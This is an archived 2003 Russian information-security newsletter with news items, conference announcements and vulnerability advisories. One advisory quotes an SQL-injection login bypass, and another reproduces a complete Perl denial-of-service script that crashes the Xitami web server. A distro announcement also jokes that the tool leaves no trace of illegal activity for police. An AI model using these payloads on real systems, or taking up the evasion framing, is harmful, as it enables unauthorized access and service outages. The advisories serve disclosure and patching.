Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Вышел RTK 0.4: Дистрибутив для проверки безопасности
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.RTK: Russian Trinux Kit - это первый российский дистрибутив ОС Linux, предназначенный для анализа сетевой безопасности удаленных и/или локальных вычислительных систем и сетей. RTK содержит последние версии популярных digital security утилит, написанных как специалистами по безопасности, так и высококвалифицированными хакерами.
В поставку входят всевозможные сетевые утилиты, сканнеры, снифферы, криптографические средства, файрволлы, прокси серверы, редиректы, релизы известных хакерских групп и пр. В общей сложности система содержит более 150 security-программ.
Система не требует установки и ей НЕ нужен жесткий диск, виртуальный раздел системы создается в ОЗУ (RAM). Данная особенность позволяет Вам использовать систему на любой машине с достаточным количеством оперативной памяти (это очень удобно для людей, которые хотят провести "сетевой анализ", но находятся вдали от своего родного ПК).
ОЗУ (Временная Памать Машины) сбрасывается после каждой перезагрузки (способы восстановления данных мне неизвестны), следовательно никаких следов ваших противоправных действий не остается (во всяком случае на вашем компьютере). Естественно это создает дополнительные (и очень существенные) проблемы для правоохранительных органов :-).
Но Вы должны понимать, что использование утилит дистрибутива может привести к несанкционированному доступу к системе (например использование "некой" утилиты nessus может расцениваться удаленным администратором как прямая попытка взлома), либо к получению/перехвату конфиденциальной информации (к примеру запуск mailsnarf). Ваши действия могут попасть под статью 272 УК РФ.
Я не буду открывать дебаты по поводу квалификации нашего Управления "К"("Р"), но хочу заметить, что все необходимые материалы для задержания и следствия может предоставить сам системный администратор. О последующей экспертизе (анализе машины взломщика) речи быть не может, так как система RTK не оставляет никаких следов.
Подводя итог хочу сказать, что прежде чем проводить анализ системы безопасности, спросите разрешения у системного администратора "атакуемой" машины (лучше в письменном виде). Или во всяком случае убедитесь, что взлом тчательно продуман...
Отличительной особенностью данного дистрибутива является максимальное повышение критериев тестирования. В тестировании дистрибутива принимал участие v1pee из Nerf (http://www.nerf.ru).
Приложения, включенные в дистрибутив:
* Nessus 2.0.7 * Nikto 1.30 c1.09 * Nmap 3.30 * Ettercap 0.6b * Ethereal 0.9.13 * dsniff 2.3 * KisMet 2.8.1 * Flawfinder 2.22 * chntpw (date 030426) * John The Ripper 1.6 * sleuthkit 1.62 * Nemesis 1.4beta3 * Xprobe2 2.0.1 * mtr 0.54 * tcptraceroute 1.4На данный момент дистрибутив только что поступил в продажу, но образ в скором времени станет доступен.
Более подробную информацию о системе RTK: Russian Trinux Kit вы сможете получить по адресу http://linuxsecurity.ru
0АДЭ будет бороться с вирусами и спамом
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.В понедельник, 22 сентября, Ассоциация документальной электросвязи (АДЭ) объявила о том, что Минсвязи РФ рассмотрело и одобрило подготовленный этой организацией «Меморандум о противодействии распространению вредоносных программ (вирусов) и несанкционированных рекламных рассылок (спама)».
На основании этого документа министерство решило поддержать предложение АДЭ о создании постоянно действующей рабочей группы по выполнению и координации работ в области противодействия распространению вирусов и спама.
Как рассказали IT-daily в ассоциации, эта группа будет создана на базе АДЭ. Правда, еще не определено, кто войдет в ее состав и когда она начнет свою работу. Решением этих вопросов ассоциация планирует заняться в начале следующего месяца.
Группа еще не создана, но ей уже дано первое задание - подготовить и представить в Минсвязи план мероприятий по совершенствованию законодательства в области борьбы с вирусами и спамом, разработать политику безопасности, технические и организационные меры противодействия их распространению. Срок выполнения этих работ пока также не определен.
1Назван новый "гуру" по информационной безопасности США
23 сентября | Рубрика: Информационая безопасность бизнеса Информационая безопасность государственной власти Информационая безопасность общественной коммуникации, личности.В администрацию президента Буша утвердили Амита Йоран (Amit Yoran), бывшего исполнительного директора компании Symantec, который теперь будет курировать вопросы национальной информационной безопасности. Как заявили представители администрации, кандидатура Амита Йорана была выбрана ввиду значительного опыта, которым располагает этот ветеран фронта компьютерных атак, как в частном, так и в корпоративном секторе.
На новом посту Йоран будет выполнять две основные функции. С одной стороны, он должен представлять интересы госструктур в борьбе с киберпреступностью. С другой стороны, он также будет контролировать повышение уровня безопасности как физических, так и юридических лиц США.
Йоран становится наследником Ричарда Кларка (Richard Clarke), долгое время возглавлявшего борьбу Белого Дома против кибертерроризма и покинувшего свой пост в январе этого года.
После этого был принят закон о внутренней безопасности, и правительственные структуры, занимающиеся обеспечением компьютерной безопасности, перешли под контроль Департамента внутренней безопасности, объединившего функции пяти ранее существовавших спецструктур. В частности, это были: Центр по защите национальной инфраструктуры ФБР (National Infrastructure Protection Center), Национальная коммуникационная система Департамента безопасности (National Communications System), Отдел обеспечения безопасности стратегически важных объектов Департамента Финансов (Critical Infrastructure Assurance Office), Аналитический центр Департамента Энергетики (analysis center), а также Федеральный центр обработки запросов по компьютерным инцидентам (Federal Computer Incident Response Center).
2Sun и Check Point представили совместное решение по безопасности
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Компании Sun Microsystems, Check Point Software Technologies и Корпорация ЮНИ представляют программу продвижения совместных решений Sun и Check Point в области защиты информации на российском рынке.
Стратегия Sun Microsystems в области защиты информации предполагает внедрение средств защиты в продукты на стадии проектирования. Sun придерживается принципа “безопасности во всем” и считает, что системы безопасности должны, прежде всего, обеспечивать высокий уровень надежности, не усложняя при этом бизнес-процессы.
Check Point Software Technologies – компания, которая руководствуется в своей деятельности теми же принципами и взглядами на безопасность информационных систем, что и компания Sun Microsystems. Программное обеспечение Check Point обеспечивает высокую защиту внутренней сети организации и совместимо с системами начального уровня любого производителя.
Интегрированные решения Sun Microsystems и Check Point призваны повысить уровень защищенности сети предприятия. Они созданы на основе систем Sun LX50, Sun Fire V65x под управлением ОС Linux и Solaris x86, Sun Fire V210, Sun Fire V240 на платформе SPARC под управлением ОС Solaris и программного обеспечения Check Point VPN-1/FireWall-1. Совместное решение способно более эффективно противостоять угрозам из интернета и обеспечивать максимальную защиту корпоративной сети. Оно подходит как для крупных предприятий, так и для небольших организаций численностью до 100 человек, так как требует минимум средств и временных затрат на развертывание и сопровождение.
В части практической реализации программы продвижения Sun Microsystems и Check Point сотрудничают с корпорацией ЮНИ. В июне 2003 года стартовала программа ЮНИ “Формула универсальной безопасности”. Программа включает годовую сервисную и техническую поддержку, обучение одного специалиста в учебном центре NTC Корпорации ЮНИ и предустановку программного обеспечения на сервер.
3Информационная безопасность корпоративных сетей
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, датыКомпания Rainbow Technologies объявляет о проведении 30 сентября — 2 октября второй практической конференции “Информационная безопасность корпоративных сетей”.
Она пройдет в рамках четвертой всероссийской научно-практической конференции “Информационные технологии в России”, которая состоится во время крупнейшей национальной ИT-выставки “SofTool-2003” (30 сентября — 3 октября) в малом конференц-зале павильона № 69 ВВЦ.
Программа мероприятий включает работу следующих секций:
- “Информационная безопасность в XXI веке. Новые проблемы — новые тенденции”;
- “Политика безопасности в современной компании. Комплексные системы защиты информации. Аутсорсинг”;
- “Антивирусное программное обеспечение. Средства мониторинга и фильтрации электронной почты и Web-ресурсов”;
- “Защита периметра сети”;
- “Аутентификация. Электронно-цифровая подпись. Криптографическая защита информации”;
- “Системы защиты от несанкционированного доступа”.
Слушатели ознакомятся с новыми решениями в области средств контентного анализа для защиты корпоративной электронной почты, аутсорсинга, аутентификации, криптографической защиты информации и другими практическими аспектами применения новейших технологий информационной безопасности.
Для участия в конференции нужно зарегистрироваться на сайте компании Rainbow Technologies.
4Цифровая подпись и IT в Украине
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.Развитие компьютерных сетей и телекоммуникаций в Украине значительно расширяет
возможности применения современных информационных технологий и делает реальным
создание систем юридически значимого электронного документооборота,
осуществляемого с использованием информационных систем.
Основным
правовым препятствием, стоящим на пути развития электронного документооборота,
является невозможность предоставлять электронные документы, например, договоры,
в качестве доказательств в суде при возникновении споров из-за отсутствия
юридической силы таких документов. Кроме того, возможность отказа одной из
сторон от транзакции или даже недоверие сторон вообще часто приводит к тому, что
сделка попросту отменяется, а ее организаторы теряют потенциальных клиентов. В
некоторых случаях эту проблему решают с помощью заключения соглашений между
самими участниками обмена, учитывая возможность использования электронных
документов в качестве доказательств при возникновении конфликтных ситуаций. Но
такой подход удобен далеко не всегда: в частности, простой обмен документами
между организациями не должен предполагать предварительное заключение каких-либо
договоров. Здесь на помощь приходит механизм цифровой подписи.
Цифровая
подпись предоставляет пользователям возможность обеспечить аутентичность и
целостность электронного документа, а также засвидетельствовать авторство
владельца, заверяющего таким способом документ. Сегодня существует достаточно
много программных продуктов, реализованных в виде дополнений к стандартным
приложениям. Эти продукты предоставляют весь спектр услуг по использованию
цифровой подписи. При этом процедуры наложения и проверки подписи совершенно
«прозрачны» для рядовых пользователей и, как правило, не вызывают никаких
трудностей, хотя большинству из них незнаком механизм электронной цифровой
подписи. Другими словами, можно с уверенностью заявить, что уровень развития
общества вплотную подошел к необходимости использования в электронном
документообороте цифровой подписи как способа удостоверения подлинности и
аутентичности электронных данных.
12 июня Президент Украины Леонид КУЧМА
подписал законы Украины "Об электронной цифровой подписи" и "Об электронных
документах и электронном документообороте", которые приняты Верховной Радой 22
мая. Закон "Об электронной цифровой подписи" вступает в силу с 1 января 2004 г.,
а Закон "Об электронных документах и электронном документообороте" - через шесть
месяцев со дня его опубликования. Данные законы определяют правовые рамки
электронного документооборота в Украине.
Внедрение цифровой подписи даст
возможность применять электронные документы и электронный документооборот,
позволит упростить и ускорить документооборот между субъектами ведения
хозяйства, что повлияет на конкурентоспособность отечественной экономики, а
также ускорит оформление экспортно-импортных операций.
5
Уголовный кодекс надо чтить
23 сентября | Рубрика: Регулирование: Законы, постановления, сертификация, контрольКак известно, в Уголовном кодексе Украины содержится XVI раздел "Преступления в
сфере использования электронно-вычислительных машин (компьютеров), систем и
компьютерных сетей", посвященный преступлениям, связанным с использованием ЭВМ
(компьютеров), систем и компьютерных сетей.
С 1 сентября 2001 года -
вступления в силу нового Уголовного Кодекса Украины, прошло два года. И уже
сегодня можна сказать, что развитие IT в Украине стремительно опережает наше
законодательство, регулирующее эту область. По информации InformationWeek,
заканчивается разработка нового проекта сверхскоростной вычислительной системы.
Принцип ее основывается на новом квантовом механизме, и уже близок день, когда
появится первый квантовый (а не ЭВМ) компьютер, который будет настолько мощным,
что заставит сегодняшнюю самую быструю электронно-вычислительною машину
напоминать карманный калькулятор.
Обычная ЭВМ думает с помощью большого
количества операций. Используя эти крошечные операции и биты информации,
процессор может запоминать числа и делать все сортировки математических данных,
чтобы выполнить вычислительные команды. Квантовый компьютер будет намного
совершенней, чем нынешние модели.
Квантовый компьютер будет использовать
внутриатомные частицы - электроны. Поскольку эти частицы могут существовать в
разных состояниях одновременно, они становятся полибитными, т.е. могут хранить
несколько бит информации одновременно. Таким образом, один электрон может
проводить в несколько раз больше информации, чем обычная механическая система.
В связи с этим можно представить себе проблемы квалификации компьютерных
преступлений, а тем более уголовного преследования виновных, когда
киберпреступники будут использовать не электронно-вычислительные машины, а
квантовый компьютер.
6
Разработчики и поставщики систем и оборудования интеллектуального здания пока не пришли к единому мнению об объемах российского рынка и тенденциях его развития
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.По решению Национального экспертного Совета по высоким технологиям строительства и интеллектуальному зданию, поддержанному Минэкономразвития России, Мэрией Москвы и крупнейшими потребителями, компания «Гротек» проводит исследование объема российского рынка систем интеллектуального здания, его структуры и тенденций развития. На первом этапе опрашиваются крупнейшие производители и инсталляторы систем и оборудования интеллектуального здания.
Данные, полученные на сегодняшний день, позволяют констатировать лишь то, что рынок «интеллектуального здания» в России находится в стадии становления. Такой вывод заставляет сделать разброс приводимых респондентами оценок: от «не более $10 млн» до «свыше $150 млн». Точно такой же разброс мнений, не позволяющий пока делать выводов о действительном объеме рынка, получен и по отдельным сегментам.
Например, сегмент «комплекса безопасности» интеллектуального здания респонденты оценивают в интервале от «$1-2 млн» до «свыше $30 млн». Для сравнения: объем российского рынка оборудования CCTV, по данным исследования компании «Гротек», оценивается не менее чем в $150 млн.
Объем продаж в сегменте «комплекс систем жизнеобеспечения» оценивается экспертами в интервале «$1 млн - $70-80 млн».
Для получения корректных результатов компания «Гротек» в течение двух ближайших недель проведет серию персональных интервью с экспертами – как со специалистами в области маркетинговых исследований, так и с профессионалами в предметной области.
При этом анкетирование для увеличения статистической базы продолжается. Однако компания «Гротек» рассчитывает, что специалисты, заполняющие анкеты, будут объяснять свои оценки. Это позволит получить более достоверные данные и сформулировать консолидированное мнение производителей и инсталляторов оборудования по объему рынка систем интеллектуального здания в России.
Результаты первого этапа исследования российского рынка интеллектуального здания будут опубликованы вместе с комментариями ведущих экспертов в специальном совместном проекте редакций Каталога «Интеллектуальное здание» и журнала «Системы безопасности», приуроченном к основным осенним выставкам.
Заполнить анкету можно здесь http://www.ibuilding.groteck.ru/research.html
Экспертные мнения в свободном формате, а также дополнительные материалы по тематике исследования просьба направлять по электронной почте Vlasov@ibiz.ru
Сергей Трапани, департамент маркетинга и PR компании Гротек. Тел.: (095) 251-2970, 251-2850; факс (095) 251-3389
7Компания «Гротек» проводит исследование российского рынка систем и средств защиты информации
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. Информационные ресурсыИнформационная безопасность не интересует руководителей компаний в СНГ. Такой вывод сделали аналитики Ernst&Young, опросив 56 компаний Содружества независимых государств.
Комментируя исследование Ernst&Young, корреспондент газеты «Известия» Александр Латкин указал, что «получить информацию о тратах на информационную безопасность в СНГ достаточно трудно». Чтобы восполнить этот пробел, компания «Гротек» проводит исследование российского рынка систем и средств защиты информации - IT-Security. Респонденты – более 11 тысяч подписчиков изданий компании «Гротек» («Системы безопасности», «Технологии и средства связи», iBusiness). Критерий отбора опрашиваемых – отметка в анкете квалифицированной подписки, что «тема информационной безопасности их интересует» и что «в их организации выделяются средства на обеспечение информационной безопасности».
Мнение о структуре рынка, структуре спроса и основных тенденциях развития выясняется отдельно у производителей/поставщиков (разработчиков, дистрибьюторов, дилеров, инсталляторов, системных интеграторов) и потребителей средств и систем защиты информации.
При подведении окончательных итогов исследования будут учитываться данные, полученные в ходе исследований Ernst&Young и Cnews.
В ходе подготовки к проведению исследования сотрудники компании «Гротек» провели серию встреч с крупнейшими потребителями средств и систем защиты информации. Как заявили представители Министерства и обороны и одной из крупнейших компаний нефтегазового комплекса, наряду с данными об общей структуре рынка и прогнозах его развития, их интересуют данные о законченных комплексных проектах обеспечения информационной безопасности в российских организациях.
Со своей стороны, ведущие компании, работающие на рынке информационной безопасности в России, выразили желание иметь данные о структуре спроса российских предприятий на средства и системы защиты информации в отраслевом разрезе и о механизмах принятия решений о закупке оборудования и систем в компаниях-потребителях.
Откликаясь на данные предложения, компания «Гротек» приняла решение о публикации в Каталоге «Системы и средства защиты информации.IT-Security» и в специальной вкладке «IT-Security» в №6 журнала «Системы безопасности» комментариев специалистов, содержащих ответы на поставленные потребителями и поставщиками вопросы. Оба издания выйдут в декабре – в период планирования бюджетов ведущих потребителей на закупки систем и средств защиты информации. Общий тираж составит 35.000 экземпляров. При этом в Каталоге акцент будет сделан на мнение поставщиков, а «Системах безопасности» №6 – на мнение потребителей.
Принять участие в исследовании можно, заполнив анкету.
Экспертные мнения и иные материалы, способствующие получению дополнительных данных для проведения исследования, просьба направлять по электронной почте Vlasov@ibiz.ru
С дополнительной информацией можно ознакомиться здесь .
Департамент маркетинга и PR компании Гротек. Тел. +7 095 2512970; факс +7 095 2513389
8Качество работы Корпорации ЮНИ подтверждено сертификатом
23 сентября | Рубрика: Регулирование: Законы, постановления, сертификация, контрольКорпорация ЮНИ сообщает о получении сертификата, подтверждающего соответствие системы менеджмента качества компании требованиям российского стандарта ГОСТ Р ИСО 9001-2001 и международного стандарта МС ИСО 9001:2000. Действие сертификата распространяется на проектирование, создание, ввод в эксплуатацию и обслуживание современных информационно-телекоммуникационных систем, поставку телекоммуникационного оборудования и программного обеспечения.
«Причиной, побудившей нас начать процесс сертификации, стало стремление к совершенствованию существующей модели бизнеса компании, повышению результативности системы менеджмента качества и обеспечению непрерывности управления. Мы рассчитываем, что это позволит ЮНИ более гибко реагировать на запросы и пожелания клиентов и эффективно удовлетворять их потребности, что в конечном итоге послужит дальнейшему укреплению и расширению нашего партнерства. Корпорация всегда чрезвычайно внимательно относилась к вопросам обеспечения качества продукции и услуг. В этой связи сертификация ИСО 9001-2001 является важным достижением для компании, демонстрирующим соответствие работы ЮНИ самым строгим международным требованиям» - отметил Первый вице-президент Корпорации ЮНИ Сергей Малышев.
Сертификация, начатая в ноябре 2002 г., была проведена аудиторами Центра «Интерэкомс». За этот период была разработана политика ЮНИ в области качества и комплекс внутренних стандартов предприятия, а существовавшая ранее система менеджмента качества полностью адаптирована к требованиям стандарта. Результатом реструктуризации внутренних процессов стала оптимизация взаимодействия и повышение результативности совместной работы подразделений компании.
Получение сертификата соответствия стандарту качества ИСО 9001-2001 даст Корпорации ЮНИ весомые и долгосрочные конкурентные преимущества, которые, в свою очередь, будут способствовать укреплению позиций компании на российском рынке информационных и телекоммуникационных технологий.
9Конференция "Проблема спама и её решения"
23 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, даты24-25 сентября 2003 г. в Доме общественных организаций при ГУ Правительства Москвы Национальная коалиция против спама в составе "Ашманов и Партнёры", "Голден Телеком", Лаборатория Касперского, Mail.Ru, российское представительство "Майкрософт", Rambler и Subscribe.Ru, при поддержке DATA FORT проводят Первую национальную конференцию "Проблема спама и её решения".
В рамках конференции будут проведены два круглых стола: "Государство, общество и спам: уничтожить или цивилизовать?" – дискуссия о допустимых и запрещённых приёмах рекламы, и "Имеет ли задача решение?" – обсуждение вопросов эффективной фильтрации спама.
Среди участников конференции будут разыграны три комплекта лицензий на сервер фильтрации спама Kaspersky Antispam общей стоимостью около $5 тысяч.
С подробной программой конференции можно ознакомиться здесь. Для участия в конференции необходима предварительная регистрация.
10Неавторизованный доступ в Community Wizard
23 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: Community Wizard User Authentication Bypass Vulnerability
Опасность: Средняя
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в Community Wizard. Злонамеренный пользователь может получить неавторизованный доступ к системе.
Уязвимость SQL инъекции обнаружена в сценарии login.asp. Удаленный пользователь может представить специально обработанный пароль ('or''=') в сочетании с правильным именем пользователя, чтобы получить неавторизованный доступ к системе.
URL производителя:http://www.commwiz.com/
Решение: Установите обновление: http://www.commwiz.com/fldesoft.asp?ID=24&CatID=3&SubCatID=0
11Уязвимость в обработке TCP пакетов в Microsoft Windows 2000 и Windows XP
23 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server, Microsoft Windows 2000 Professional, Microsoft Windows 2000 Server, Microsoft Windows XP Home Edition, Microsoft Windows XP Professional. Опасность: Низкая Наличие эксплоита: Не нужен Описание: Уязвимость обнаружена в обработке TCP пакетов в Microsoft Windows 2000 и Windows XP. Удаленный атакующий может раскрыть чувствительную информацию. Windows, при определенных обстоятельствах, не сбрасывает "URG" тэг TCP пакетов. Когда это происходит, Windows не устанавливает корректное значение для 16 битового значения "URG", включая в тэг "URG" случайные данные других пакетов. URL производителя:http://www.microsoft.com Решение: Для передачи критически важных данных используйте шифрованный трафик. |
Удаленное переполнение буфера в sshd демоне в Sun Solaris
23 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Sun Solaris 9 Опасность: Высокая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Sun Solaris. Злонамеренный пользователь может выполнить DoS нападение или скомпрометировать уязвимую систему. Уязвимость связанна с переполнением буфера в Solaris Secure Shell daemon (sshd), который основан на OpenSSH. URL производителя: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/56861 Решение:Sun рекомендует отключить уязвимый сервис до выхода заплаты или ограничить к нему доступ только из доверенных IP адресов. |
Удаленное выполнение произвольного кода в MondoSearch
23 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: MondoSearch 4.x-5.х
Опасность: Критическая
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в MondoSearch. Злонамеренный пользователь может получить доступ к уязвимой системе.
Дополнительные подробности не сообщаются. Mondosoft оценила риск обнаруженной уязвимости как “критический” и советует немедленно установить заплату.
URL производителя: http://www.mondosoft.com/security/
Решение: Установите заплату для версий 4.4, 5.0, и 5.1: http://www.mondosoft.com/security/msp0903a.zip
14Удаленный DoS против Xitami Web сервера
23 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: - Xitami 2.5B4 (bw3225b4.exe), Xitami 2.4D9 (bw3224d9.exe). Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Xitami Web сервере. Удаленный атакующий может аварийно завершить работу Web сервера. Удаленный атакующий может послать http get запрос к .shtm файлу с http заголовком размером более 5154 байт, за которым следует “:”, чтобы аварийно завершить работу Xitami с ошибкой Microsoft Visual C++ Runtime Error в XIWIN32.EXE. #!/usr/local/bin/perl # # Simple exploit for Imatix Xitami Webserver on Windows NT # # Sending a GET request for a *.shtm file with a header field of >= 5154 bytes, followed by a ":", # will crash the service. # # Vulnerable versions: # - Xitami 2.5B4 (bw3225b4.exe) # - Xitami 2.5B4 (bs3225b4.exe) # - Xitami 2.4D9 (bw3224d9.exe) # - others? # # For legal purposes only ! # # 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de use IO::Socket; $ip="127.0.0.1"; $port=80; $var="A" x 5157; $mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5); $mySocket->autoflush(1); print $mySocket "GET /test.shtm HTTP/1.0\r\n". $var.": */*\r\n\r\n"; @answer=<$mySocket>; $length=@answer; if ($length==0){die "\nService killed!\n";} print @answer;Возможно версии под другие платформы, отличные от Windows, также уязвимы. URL производителя: http://www.ximati.com Решение:Ограничьте максимальные размеры HTTP заголовков в HTTP прокси. |
Удаленный root доступ к Lucent (Ascend) MAX TNT Universal Gateway
23 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Lucent (Ascend) MAX TNT Universal Gateway 8.0.1 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Lucent (Ascend) MAX TNT Universal Gateway. Удаленный dial-up пользователь может получить root доступ к устройству. Удаленный пользователь может подключится к шлюзу, используя терминального клиента и, в некоторых случаях, получить root доступ к системе. Для эксплуатации уязвимости не требуется знание рабочего имени пользователя и пароля. Пример/Эксплоит: См. Источник сообщения. URL производителя: http://www.lucent.com/products/subcategory/0,,CTID+2017-STID+10443-LOCL+1,00.html/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к устройству доверенными diul-up пользователями. |
Небезопасные правила фильтрации в ipmasq в Debian GNU/Linux
23 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: Debian GNU/Linux 3.0, Debian GNU/Linux unstable alias sid.
Опасность: Средняя
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в ipmasq в Debian GNU/Linux. Злонамеренный пользователь может послать трафик к системе, доступ к которой должен быть запрещен межсетевой защитой.
Уязвимость связанна с неправильной обработкой правил. Входящие пакеты, полученные на внешнем интерфейсе и адресуемые для внутреннего хоста, перенаправляются к хосту, независимо от того, связанны они с установленным подключением или нет.
URL производителя:http://security.debian.org
Решение: Обновите пакеты:
http://security.debian.org/pool/updates/main/i/ipmasq/ipmasq_3.5.10c.dsc Size/MD5 checksum: 502 f5f259d819d47b687c3da42d931b1404 http://security.debian.org/pool/updates/main/i/ipmasq/ipmasq_3.5.10c.tar.gz Size/MD5 checksum: 30656 e9a9a1f86bd88dcceaeba900698165bb Architecture independent components: http://security.debian.org/pool/updates/main/i/ipmasq/ipmasq_3.5.10c_all.deb Size/MD5 checksum: 47748 199a747d5c48c145cf34772f26cbba4d17
Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||